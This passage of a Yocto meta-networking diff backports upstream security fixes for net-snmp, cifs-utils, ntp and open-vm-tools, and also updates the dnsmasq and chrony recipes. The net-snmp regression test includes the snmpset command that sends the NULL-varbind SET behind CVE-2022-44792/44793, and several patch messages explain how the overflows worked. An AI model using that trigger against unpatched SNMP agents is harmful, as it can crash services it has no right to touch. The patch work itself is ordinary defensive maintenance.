amongst +# other things) the sstate checks will clean the build directory when the +# task hashes changes. +# +# We can't use the approach of setting ${S} to mDNSPosix as we need +# DEBUG_PREFIX_MAP to cover files which come from the Clients directory too. +S = "${WORKDIR}/git" EXTRA_OEMAKE += "os=linux DEBUG=0 'CC=${CC}' 'LD=${CCLD} ${LDFLAGS}'" TARGET_CC_ARCH += "${LDFLAGS}" do_install () { + cd mDNSPosix + install -d ${D}${sbindir} install -m 0755 build/prod/mdnsd ${D}${sbindir} diff --git a/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch b/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch new file mode 100644 index 0000000000..ce7e3422ed --- /dev/null +++ b/meta-networking/recipes-protocols/net-snmp/net-snmp/CVE-2022-44792-CVE-2022-44793.patch @@ -0,0 +1,116 @@ +From 4589352dac3ae111c7621298cf231742209efd9b Mon Sep 17 00:00:00 2001 +From: Bill Fenner <fenner@gmail.com> +Date: Fri, 25 Nov 2022 08:41:24 -0800 +Subject: [PATCH ] snmp_agent: disallow SET with NULL varbind + +Upstream-Status: Backport [https://github.com/net-snmp/net-snmp/commit/be804106fd0771a7d05236cff36e199af077af57] +CVE: CVE-2022-44792 & CVE-2022-44793 +Signed-off-by: Hitendra Prajapati <hprajapati@mvista.com> +--- + agent/snmp_agent.c | 32 +++++++++++++++++++ + apps/snmpset.c | 1 + + .../default/T0142snmpv2csetnull_simple | 31 ++++++++++++++++++ + 3 files changed, 64 insertions(+) + create mode 100644 testing/fulltests/default/T0142snmpv2csetnull_simple + +diff --git a/agent/snmp_agent.c b/agent/snmp_agent.c +index 3376357..f51c252 100644 +--- a/agent/snmp_agent.c ++++ b/agent/snmp_agent.c +@@ -3719,12 +3719,44 @@ netsnmp_handle_request(netsnmp_agent_session *asp, int status) + return 1; + } + ++static int ++check_set_pdu_for_null_varbind(netsnmp_agent_session *asp) ++{ ++ int i; ++ netsnmp_variable_list *v = NULL; ++ ++ for (i = 1, v = asp->pdu->variables; v != NULL; i++, v = v->next_variable) { ++ if (v->type == ASN_NULL) { ++ /* ++ * Protect SET implementations that do not protect themselves ++ * against wrong type. ++ */ ++ DEBUGMSGTL(("snmp_agent", "disallowing SET with NULL var for varbind %d\n", i)); ++ asp->index = i; ++ return SNMP_ERR_WRONGTYPE; ++ } ++ } ++ return SNMP_ERR_NOERROR; ++} ++ + int + handle_pdu(netsnmp_agent_session *asp) + { + int status, inclusives = 0; + netsnmp_variable_list *v = NULL; + ++#ifndef NETSNMP_NO_WRITE_SUPPORT ++ /* ++ * Check for ASN_NULL in SET request ++ */ ++ if (asp->pdu->command == SNMP_MSG_SET) { ++ status = check_set_pdu_for_null_varbind(asp); ++ if (status != SNMP_ERR_NOERROR) { ++ return status; ++ } ++ } ++#endif /* NETSNMP_NO_WRITE_SUPPORT */ ++ + /* + * for illegal requests, mark all nodes as ASN_NULL + */ +diff --git a/apps/snmpset.c b/apps/snmpset.c +index 50f33db..387a51d 100644 +--- a/apps/snmpset.c ++++ b/apps/snmpset.c +@@ -182,6 +182,7 @@ main(int argc, char *argv[]) + case 'x': + case 'd': + case 'b': ++ case 'n': /* undocumented */ + #ifdef NETSNMP_WITH_OPAQUE_SPECIAL_TYPES + case 'I': + case 'U': +diff --git a/testing/fulltests/default/T0142snmpv2csetnull_simple b/testing/fulltests/default/T0142snmpv2csetnull_simple +new file mode 100644 +index 0000000..0f1b8f3 +--- /dev/null ++++ b/testing/fulltests/default/T0142snmpv2csetnull_simple +@@ -0,0 +1,31 @@ ++#!/bin/sh ++ ++. ../support/simple_eval_tools.sh ++ ++HEADER SNMPv2c set of system.sysContact.0 with NULL varbind ++ ++SKIPIF NETSNMP_DISABLE_SET_SUPPORT ++SKIPIF NETSNMP_NO_WRITE_SUPPORT ++SKIPIF NETSNMP_DISABLE_SNMPV2C ++SKIPIFNOT USING_MIBII_SYSTEM_MIB_MODULE ++ ++# ++# Begin test ++# ++ ++# standard V2C configuration: testcomunnity ++snmp_write_access='all' ++. ./Sv2cconfig ++STARTAGENT ++ ++CAPTURE "snmpget -On $SNMP_FLAGS -c testcommunity -v 2c $SNMP_TRANSPORT_SPEC:$SNMP_TEST_DEST$SNMP_SNMPD_PORT .1.3.6.1.2.1.1.4.0" ++ ++CHECK ".1.3.6.1.2.1.1.4.0 = STRING:" ++ ++CAPTURE "snmpset -On $SNMP_FLAGS -c testcommunity -v 2c $SNMP_TRANSPORT_SPEC:$SNMP_TEST_DEST$SNMP_SNMPD_PORT .1.3.6.1.2.1.1.4.0 n x" ++ ++CHECK "Reason: wrongType" ++ ++STOPAGENT ++ ++FINISHED +-- +2.25.1 + diff --git a/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb b/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb index 7af5147566..eb8e1599fb 100644 --- a/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb +++ b/meta-networking/recipes-protocols/net-snmp/net-snmp_5.9.3.bb @@ -26,6 +26,7 @@ SRC_URI = "${SOURCEFORGE_MIRROR}/net-snmp/net-snmp-${PV}.tar.gz \ file://net-snmp-fix-for-disable-des.patch \ file://reproducibility-have-printcap.patch \ file://0001-ac_add_search_path.m4-keep-consistent-between-32bit.patch \ + file://CVE-2022-44792-CVE-2022-44793.patch \ " SRC_URI[sha256sum] = "2097f29b7e1bf3f1300b4bae52fa2308d0bb8d5d3998dbe02f9462a413a2ef0a" diff --git a/meta-networking/recipes-support/chrony/chrony_4.2.bb b/meta-networking/recipes-support/chrony/chrony_4.2.bb index 8ce9e1db55..b7d21b7e91 100644 --- a/meta-networking/recipes-support/chrony/chrony_4.2.bb +++ b/meta-networking/recipes-support/chrony/chrony_4.2.bb @@ -45,7 +45,7 @@ DEPENDS = "pps-tools" # Note: Despite being built via './configure; make; make install', # chrony does not use GNU Autotools. -inherit update-rc.d systemd +inherit update-rc.d systemd pkgconfig # Add chronyd user if privdrop packageconfig is selected inherit ${@bb.utils.contains('PACKAGECONFIG', 'privdrop', 'useradd', '', d)} @@ -53,14 +53,6 @@ USERADD_PACKAGES = "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '${PN}', ' USERADD_PARAM:${PN} += "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '--system -d / -M --shell /bin/nologin chronyd;', '', d)}" # Configuration options: -# - For command line editing support in chronyc, you may specify either -# 'editline' or 'readline' but not both. editline is smaller, but -# many systems already have readline for other purposes so you might want -# to choose that instead. However, beware license incompatibility -# since chrony is GPLv2 and readline versions after 6.0 are GPLv3+. -# You can of course choose neither, but if you're that tight on space -# consider dropping chronyc entirely (you can use it remotely with -# appropriate chrony.conf options). # - Security-related: # - 'sechash' is omitted by default because it pulls in nss which is huge. # - 'privdrop' allows chronyd to run as non-root; would need changes to @@ -70,14 +62,17 @@ USERADD_PARAM:${PN} += "${@bb.utils.contains('PACKAGECONFIG', 'privdrop', '--sys PACKAGECONFIG ??= "editline \ ${@bb.utils.filter('DISTRO_FEATURES', 'ipv6', d)} \ " -PACKAGECONFIG[readline] = "--without-editline,--without-readline,readline" PACKAGECONFIG[editline] = ",--without-editline,libedit" PACKAGECONFIG[sechash] = "--without-tomcrypt,--disable-sechash,nss" -PACKAGECONFIG[privdrop] = "--with-libcap,--disable-privdrop --without-libcap,libcap" +PACKAGECONFIG[privdrop] = ",--disable-privdrop,libcap" PACKAGECONFIG[scfilter] = "--enable-scfilter,--without-seccomp,libseccomp" PACKAGECONFIG[ipv6] = ",--disable-ipv6," -PACKAGECONFIG[nss] = "--with-nss,--without-nss,nss" -PACKAGECONFIG[libcap] = "--with-libcap,--without-libcap,libcap" + +# These are left for backwards compatibility, to avoid breaking existing +# configurations. +PACKAGECONFIG[libcap] = "" +PACKAGECONFIG[nss] = "" +PACKAGECONFIG[readline] = "" # --disable-static isn't supported by chrony's configure script. DISABLE_STATIC = "" diff --git a/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb b/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb index d4cdda0f81..516e467ee4 100644 --- a/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb +++ b/meta-networking/recipes-support/cifs/cifs-utils_6.14.bb @@ -5,7 +5,10 @@ LICENSE = "GPL-3.0-only & LGPL-3.0-only" LIC_FILES_CHKSUM = "file://COPYING;md5=d32239bcb673463ab874e80d47fae504" SRCREV = "8c06dce7d596e478c20bc54bdcec87ad97f80a1b" -SRC_URI = "git://git.samba.org/cifs-utils.git;branch=master" +SRC_URI = "git://git.samba.org/cifs-utils.git;branch=master \ + file://CVE-2022-27239.patch \ + file://CVE-2022-29869.patch \ +" S = "${WORKDIR}/git" DEPENDS += "libtalloc" diff --git a/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch b/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch new file mode 100644 index 0000000000..77f6745abe --- /dev/null +++ b/meta-networking/recipes-support/cifs/files/CVE-2022-27239.patch @@ -0,0 +1,40 @@ +From 007c07fd91b6d42f8bd45187cf78ebb06801139d Mon Sep 17 00:00:00 2001 +From: Jeffrey Bencteux <jbe@improsec.com> +Date: Thu, 17 Mar 2022 12:58:52 -0400 +Subject: [PATCH] CVE-2022-27239: mount.cifs: fix length check for ip option + parsing + +Previous check was true whatever the length of the input string was, +leading to a buffer overflow in the subsequent strcpy call. + +Bug: https://bugzilla.samba.org/show_bug.cgi?id=15025 + +Signed-off-by: Jeffrey Bencteux <jbe@improsec.com> +Reviewed-by: David Disseldorp <ddiss@suse.de> + +Upstream-Status: Backport [ https://git.samba.org/?p=cifs-utils.git;a=commit;h=007c07fd91b6d42f8bd45187cf78ebb06801139d] +CVE: CVE-2022-27239 +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> +--- + mount.cifs.c | 5 +++-- + 1 file changed, 3 insertions(+), 2 deletions(-) + +diff --git a/mount.cifs.c b/mount.cifs.c +index 84274c9..3a6b449 100644 +--- a/mount.cifs.c ++++ b/mount.cifs.c +@@ -926,9 +926,10 @@ parse_options(const char *data, struct parsed_mount_info *parsed_info) + if (!value || !*value) { + fprintf(stderr, + "target ip address argument missing\n"); +- } else if (strnlen(value, MAX_ADDRESS_LEN) <= ++ } else if (strnlen(value, MAX_ADDRESS_LEN) < + MAX_ADDRESS_LEN) { +- strcpy(parsed_info->addrlist, value); ++ strlcpy(parsed_info->addrlist, value, ++ MAX_ADDRESS_LEN); + if (parsed_info->verboseflag) + fprintf(stderr, + "ip address %s override specified\n", +-- +2.34.1 diff --git a/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch b/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch new file mode 100644 index 0000000000..f0c3f37dec --- /dev/null +++ b/meta-networking/recipes-support/cifs/files/CVE-2022-29869.patch @@ -0,0 +1,48 @@ +From 8acc963a2e7e9d63fe1f2e7f73f5a03f83d9c379 Mon Sep 17 00:00:00 2001 +From: Jeffrey Bencteux <jbe@improsec.com> +Date: Sat, 19 Mar 2022 13:41:15 -0400 +Subject: [PATCH] mount.cifs: fix verbose messages on option parsing + +When verbose logging is enabled, invalid credentials file lines may be +dumped to stderr. This may lead to information disclosure in particular +conditions when the credentials file given is sensitive and contains '=' +signs. + +Bug: https://bugzilla.samba.org/show_bug.cgi?id=15026 + +Signed-off-by: Jeffrey Bencteux <jbe@improsec.com> +Reviewed-by: David Disseldorp <ddiss@suse.de> + +Upstream-Status: Backport [https://git.samba.org/?p=cifs-utils.git;a=commit;h=8acc963a2e7e9d63fe1f2e7f73f5a03f83d9c379] +CVE: CVE-2022-29869 +Signed-off-by: Lee Chee Yang <chee.yang.lee@intel.com> +--- + mount.cifs.c | 6 +----- + 1 file changed, 1 insertion(+), 5 deletions(-) + +diff --git a/mount.cifs.c b/mount.cifs.c +index 3a6b449..2278995 100644 +--- a/mount.cifs.c ++++ b/mount.cifs.c +@@ -628,17 +628,13 @@ static int open_cred_file(char *file_name, + goto return_i; + break; + case CRED_DOM: +- if (parsed_info->verboseflag) +- fprintf(stderr, "domain=%s\n", +- temp_val); + strlcpy(parsed_info->domain, temp_val, + sizeof(parsed_info->domain)); + break; + case CRED_UNPARSEABLE: + if (parsed_info->verboseflag) + fprintf(stderr, "Credential formatted " +- "incorrectly: %s\n", +- temp_val ? temp_val : "(null)"); ++ "incorrectly\n"); + break; + } + } +-- +2.34.1 + diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch b/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch deleted file mode 100644 index be2bb42fc2..0000000000 --- a/meta-networking/recipes-support/dnsmasq/dnsmasq/lua.patch +++ /dev/null @@ -1,31 +0,0 @@ -From be1b3d2d0f1608cba5efee73d6aac5ad0709041b Mon Sep 17 00:00:00 2001 -From: Joe MacDonald <joe_macdonald@mentor.com> -Date: Tue, 9 Sep 2014 10:24:58 -0400 -Subject: [PATCH] Upstream-Status: Inappropriate [OE specific] - -Signed-off-by: Christopher Larson <chris_larson@mentor.com> -Signed-off-by: Paul Eggleton <paul.eggleton@linux.intel.com> - ---- - Makefile | 4 ++-- - 1 file changed, 2 insertions(+), 2 deletions(-) - -diff --git a/Makefile b/Makefile -index 73ea23e..ed3eeb9 100644 ---- a/Makefile -+++ b/Makefile -@@ -60,8 +60,8 @@ idn2_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LIBIDN2 $(PKG_CONFI - idn2_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LIBIDN2 $(PKG_CONFIG) --libs libidn2` - ct_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_CONNTRACK $(PKG_CONFIG) --cflags libnetfilter_conntrack` - ct_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_CONNTRACK $(PKG_CONFIG) --libs libnetfilter_conntrack` --lua_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --cflags lua5.2` --lua_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --libs lua5.2` -+lua_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --cflags lua` -+lua_libs = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_LUASCRIPT $(PKG_CONFIG) --libs lua` - nettle_cflags = `echo $(COPTS) | $(top)/bld/pkg-wrapper HAVE_DNSSEC $(PKG_CONFIG) --cflags 'nettle hogweed' \ - HAVE_CRYPTOHASH $(PKG_CONFIG) --cflags nettle \ - HAVE_NETTLEHASH $(PKG_CONFIG) --cflags nettle` - --- -2.9.5 - diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb deleted file mode 100644 index 793b61d712..0000000000 --- a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.87.bb +++ /dev/null @@ -1,7 +0,0 @@ -require dnsmasq.inc - -SRC_URI[dnsmasq-2.87.sha256sum] = "ae39bffde9c37e4d64849b528afeb060be6bad6d1044a3bd94a49fce41357284" -SRC_URI += "\ - file://lua.patch \ -" - diff --git a/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb new file mode 100644 index 0000000000..6e4c331102 --- /dev/null +++ b/meta-networking/recipes-support/dnsmasq/dnsmasq_2.90.bb @@ -0,0 +1,3 @@ +require dnsmasq.inc + +SRC_URI[dnsmasq-2.90.sha256sum] = "8f6666b542403b5ee7ccce66ea73a4a51cf19dd49392aaccd37231a2c51b303b" diff --git a/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb b/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb index 004330e1b4..341eab015c 100644 --- a/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb +++ b/meta-networking/recipes-support/netsniff-ng/netsniff-ng_0.6.8.bb @@ -33,4 +33,4 @@ do_install() { oe_runmake DESTDIR=${D} netsniff-ng_install } -BBCLASSEXTEND = "native nativesdk" +BBCLASSEXTEND = "native" diff --git a/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch b/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch new file mode 100755 index 0000000000..fbd0ec151a --- /dev/null +++ b/meta-networking/recipes-support/ntp/ntp/CVE-2023-2655x.patch @@ -0,0 +1,323 @@ +CVE: CVE-2023-26551 +CVE: CVE-2023-26552 +CVE: CVE-2023-26553 +CVE: CVE-2023-26554 +CVE: CVE-2023-26555 +Upstream-Status: Backport [https://archive.ntp.org/ntp4/ntp-4.2/ntp-4.2.8p15-3806-3807.patch] + +Signed-off-by: Peter Marko <peter.marko@siemens.com> +--- include/ntp_fp.h 2019-06-03 23:41:14.000000000 -0500 ++++ ../ntp-stable-p16-sec/include/ntp_fp.h 2023-04-17 03:17:01.655121000 -0500 +@@ -195,9 +195,9 @@ + do { \ + int32 add_f = (int32)(f); \ + if (add_f >= 0) \ +- M_ADD((r_i), (r_f), 0, (uint32)( add_f)); \ ++ M_ADD((r_i), (r_f), 0, (u_int32)( add_f)); \ + else \ +- M_SUB((r_i), (r_f), 0, (uint32)(-add_f)); \ ++ M_SUB((r_i), (r_f), 0, (u_int32)(-add_f)); \ + } while(0) + + #define M_ISNEG(v_i) /* v < 0 */ \ +--- libntp/mstolfp.c 2019-06-03 23:41:14.000000000 -0500 ++++ ../ntp-stable-p16-sec/libntp/mstolfp.c 2023-04-17 03:07:38.598581000 -0500 +@@ -14,86 +14,58 @@ + l_fp *lfp + ) + { +- register const char *cp; +- register char *bp; +- register const char *cpdec; +- char buf[100]; ++ int ch, neg = 0; ++ u_int32 q, r; + + /* + * We understand numbers of the form: + * + * [spaces][-|+][digits][.][digits][spaces|\n|\0] + * +- * This is one enormous hack. Since I didn't feel like +- * rewriting the decoding routine for milliseconds, what +- * is essentially done here is to make a copy of the string +- * with the decimal moved over three places so the seconds +- * decoding routine can be used. ++ * This is kinda hack. We use 'atolfp' to do the basic parsing ++ * (after some initial checks) and then divide the result by ++ * 1000. The original implementation avoided that by ++ * hacking up the input string to move the decimal point, but ++ * that needed string manipulations prone to buffer overruns. ++ * To avoid that trouble we do the conversion first and adjust ++ * the result. + */ +- bp = buf; +- cp = str; +- while (isspace((unsigned char)*cp)) +- cp++; + +- if (*cp == '-' || *cp == '+') { +- *bp++ = *cp++; +- } +- +- if (*cp != '.' && !isdigit((unsigned char)*cp)) +- return 0; +- +- +- /* +- * Search forward for the decimal point or the end of the string. +- */ +- cpdec = cp; +- while (isdigit((unsigned char)*cpdec)) +- cpdec++; +- +- /* +- * Found something. If we have more than three digits copy the +- * excess over, else insert a leading 0. +- */ +- if ((cpdec - cp) > 3) { +- do { +- *bp++ = (char)*cp++; +- } while ((cpdec - cp) > 3); +- } else { +- *bp++ = '0'; +- } +- +- /* +- * Stick the decimal in. If we've got less than three digits in +- * front of the millisecond decimal we insert the appropriate number +- * of zeros. +- */ +- *bp++ = '.'; +- if ((cpdec - cp) < 3) { +- size_t i = 3 - (cpdec - cp); +- do { +- *bp++ = '0'; +- } while (--i > 0); +- } +- +- /* +- * Copy the remainder up to the millisecond decimal. If cpdec +- * is pointing at a decimal point, copy in the trailing number too. +- */ +- while (cp < cpdec) +- *bp++ = (char)*cp++; ++ while (isspace(ch = *(const unsigned char*)str)) ++ ++str; + +- if (*cp == '.') { +- cp++; +- while (isdigit((unsigned char)*cp)) +- *bp++ = (char)*cp++; ++ switch (ch) { ++ case '-': neg = TRUE; ++ case '+': ++str; ++ default : break; + } +- *bp = '\0'; +- +- /* +- * Check to make sure the string is properly terminated. If +- * so, give the buffer to the decoding routine. +- */ +- if (*cp != '\0' && !isspace((unsigned char)*cp)) +- return 0; +- return atolfp(buf, lfp); ++ ++ if (!isdigit(ch = *(const unsigned char*)str) && (ch != '.')) ++ return 0; ++ if (!atolfp(str, lfp)) ++ return 0; ++ ++ /* now do a chained/overlapping division by 1000 to get from ++ * seconds to msec. 1000 is small enough to go with temporary ++ * 32bit accus for Q and R. ++ */ ++ q = lfp->l_ui / 1000u; ++ r = lfp->l_ui - (q * 1000u); ++ lfp->l_ui = q; ++ ++ r = (r << 16) | (lfp->l_uf >> 16); ++ q = r / 1000u; ++ r = ((r - q * 1000) << 16) | (lfp->l_uf & 0x0FFFFu); ++ lfp->l_uf = q << 16; ++ q = r / 1000; ++ lfp->l_uf |= q; ++ r -= q * 1000u; ++ ++ /* fix sign */ ++ if (neg) ++ L_NEG(lfp); ++ /* round */ ++ if (r >= 500) ++ L_ADDF(lfp, (neg ? -1 : 1)); ++ return 1; + } +--- ntpd/refclock_palisade.c 2020-04-11 04:31:33.000000000 -0500 ++++ ../ntp-stable-p16-sec/ntpd/refclock_palisade.c 2023-04-15 18:09:29.787588000 -0500 +@@ -1225,9 +1225,9 @@ + return; /* using synchronous packet input */ + + if(up->type == CLK_PRAECIS) { +- if(write(peer->procptr->io.fd,"SPSTAT\r\n",8) < 0) ++ if (write(peer->procptr->io.fd,"SPSTAT\r\n",8) < 0) { + msyslog(LOG_ERR, "Palisade(%d) write: %m:",unit); +- else { ++ } else { + praecis_msg = 1; + return; + } +@@ -1249,20 +1249,53 @@ + + pp = peer->procptr; + +- memcpy(buf+p,rbufp->recv_space.X_recv_buffer, rbufp->recv_length); ++ if (p + rbufp->recv_length >= sizeof buf) { ++ struct palisade_unit *up; ++ up = pp->unitptr; ++ ++ /* ++ * We COULD see if there is a \r\n in the incoming ++ * buffer before it overflows, and then process the ++ * current line. ++ * ++ * Similarly, if we already have a hunk of data that ++ * we're now flushing, that will cause the line of ++ * data we're in the process of collecting to be garbage. ++ * ++ * Since we now check for this overflow and log when it ++ * happens, we're now in a better place to easily see ++ * what's going on and perhaps better choices can be made. ++ */ ++ ++ /* Do we need to log the size of the overflow? */ ++ msyslog(LOG_ERR, "Palisade(%d) praecis_parse(): input buffer overflow", ++ up->unit); ++ ++ p = 0; ++ praecis_msg = 0; ++ ++ refclock_report(peer, CEVNT_BADREPLY); ++ ++ return; ++ } ++ ++ memcpy(buf+p, rbufp->recv_buffer, rbufp->recv_length); + p += rbufp->recv_length; + +- if(buf[p-2] == '\r' && buf[p-1] == '\n') { ++ if ( p >= 2 ++ && buf[p-2] == '\r' ++ && buf[p-1] == '\n') { + buf[p-2] = '\0'; + record_clock_stats(&peer->srcadr, buf); + + p = 0; + praecis_msg = 0; + +- if (HW_poll(pp) < 0) ++ if (HW_poll(pp) < 0) { + refclock_report(peer, CEVNT_FAULT); +- ++ } + } ++ return; + } + + static void +@@ -1407,7 +1440,10 @@ + + /* Edge trigger */ + if (up->type == CLK_ACUTIME) +- write (pp->io.fd, "", 1); ++ if (write (pp->io.fd, "", 1) != 1) ++ msyslog(LOG_WARNING, ++ "Palisade(%d) HW_poll: failed to send trigger: %m", ++ up->unit); + + if (ioctl(pp->io.fd, TIOCMSET, &x) < 0) { + #ifdef DEBUG +--- tests/libntp/strtolfp.c 2020-05-22 01:33:24.000000000 -0500 ++++ ../ntp-stable-p16-sec/tests/libntp/strtolfp.c 2023-04-16 03:28:16.967582000 -0500 +@@ -26,6 +26,13 @@ + return; + } + ++static const char* fmtLFP(const l_fp *e, const l_fp *a) ++{ ++ static char buf[100]; ++ snprintf(buf, sizeof(buf), "e=$%08x.%08x, a=$%08x.%08x", ++ e->l_ui, e->l_uf, a->l_ui, a->l_uf); ++ return buf; ++} + + void test_PositiveInteger(void) { + const char *str = "500"; +@@ -37,8 +44,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeInteger(void) { +@@ -54,8 +61,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_PositiveFraction(void) { +@@ -68,8 +75,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeFraction(void) { +@@ -85,8 +92,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_PositiveMsFraction(void) { +@@ -100,9 +107,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); +- ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_NegativeMsFraction(void) { +@@ -118,9 +124,8 @@ + TEST_ASSERT_TRUE(atolfp(str, &actual)); + TEST_ASSERT_TRUE(mstolfp(str_ms, &actual_ms)); + +- TEST_ASSERT_TRUE(IsEqual(expected, actual)); +- TEST_ASSERT_TRUE(IsEqual(expected, actual_ms)); +- ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual), fmtLFP(&expected, &actual)); ++ TEST_ASSERT_TRUE_MESSAGE(IsEqual(expected, actual_ms), fmtLFP(&expected, &actual_ms)); + } + + void test_InvalidChars(void) { diff --git a/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb b/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb index a30f720bb5..7861a5e3e6 100644 --- a/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb +++ b/meta-networking/recipes-support/ntp/ntp_4.2.8p15.bb @@ -24,11 +24,13 @@ SRC_URI = "http://www.eecis.udel.edu/~ntp/ntp_spool/ntp4/ntp-4.2/ntp-${PV}.tar.g file://sntp.service \ file://sntp \ file://ntpd.list \ + file://CVE-2023-2655x.patch;striplevel=0 \ " SRC_URI[sha256sum] = "f65840deab68614d5d7ceb2d0bb9304ff70dcdedd09abb79754a87536b849c19" # CVE-2016-9312 is only for windows. +# CVE-2019-11331 is inherent to RFC 5905 and cannot be fixed without breaking compatibility # The other CVEs are not correctly identified because cve-check # is not able to check the version correctly (it only checks for 4.2.8 omitting p15 that makes the difference) CVE_CHECK_IGNORE += "\ @@ -52,6 +54,7 @@ CVE_CHECK_IGNORE += "\ CVE-2016-7433 \ CVE-2016-9310 \ CVE-2016-9311 \ + CVE-2019-11331 \ " @@ -90,6 +93,14 @@ PACKAGECONFIG[debug] = "--enable-debugging,--disable-debugging" PACKAGECONFIG[mdns] = "ac_cv_header_dns_sd_h=yes,ac_cv_header_dns_sd_h=no,mdns" PACKAGECONFIG[ipv6] = "--enable-ipv6,--disable-ipv6," +do_configure:append() { + # tests are generated but also checked-in to source control + # when CVE-2023-2655x.patch changes timestamp of test source file, Makefile detects it and tries to regenerate it + # however it fails because of missing ruby interpretter; adding ruby-native as dependency fixes it + # since the regenerated file is identical to the one from source control, touch the generated file instead of adding heavy dependency + touch ${S}/tests/libntp/run-strtolfp.c +} + do_install:append() { install -d ${D}${sysconfdir}/init.d install -m 644 ${WORKDIR}/ntp.conf ${D}${sysconfdir} diff --git a/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch new file mode 100644 index 0000000000..071ddf45d1 --- /dev/null +++ b/meta-networking/recipes-support/open-vm-tools/open-vm-tools/CVE-2023-20867.patch @@ -0,0 +1,158 @@ +From 32fe1b6ac239255a91020020510453685459b28a Mon Sep 17 00:00:00 2001 +From: John Wolfe <jwolfe@vmware.com> +Date: Mon, 8 May 2023 19:04:57 -0700 +Subject: [PATCH] open-vm-tools: Remove some dead code. + +Address CVE-2023-20867. +Remove some authentication types which were deprecated long +ago and are no longer in use. These are dead code. + +Upstream-Status: Backport [https://github.com/vmware/open-vm-tools/blob/CVE-2023-20867.patch/2023-20867-Remove-some-dead-code.patch] +CVE: CVE-2023-20867 + +Signed-off-by: Meenali Gupta <meenali.gupta@windriver.com> +--- + 